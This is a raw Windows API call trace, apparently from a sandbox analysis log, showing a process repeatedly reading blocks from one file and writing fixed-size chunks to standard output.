[0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.244] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] GetFileType (hFile=0x4c) returned 0x1 [0227.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.244] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.245] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.245] GetFileType (hFile=0x4c) returned 0x1 [0227.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] GetFileType (hFile=0x4c) returned 0x1 [0227.246] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.246] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.247] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] GetFileType (hFile=0x4c) returned 0x1 [0227.247] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.247] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.248] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.248] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.248] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.249] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.249] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.249] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.249] GetFileType (hFile=0x4c) returned 0x1 [0227.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.250] GetFileType (hFile=0x4c) returned 0x1 [0227.250] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.250] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.410] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.412] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.412] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.413] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.413] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] 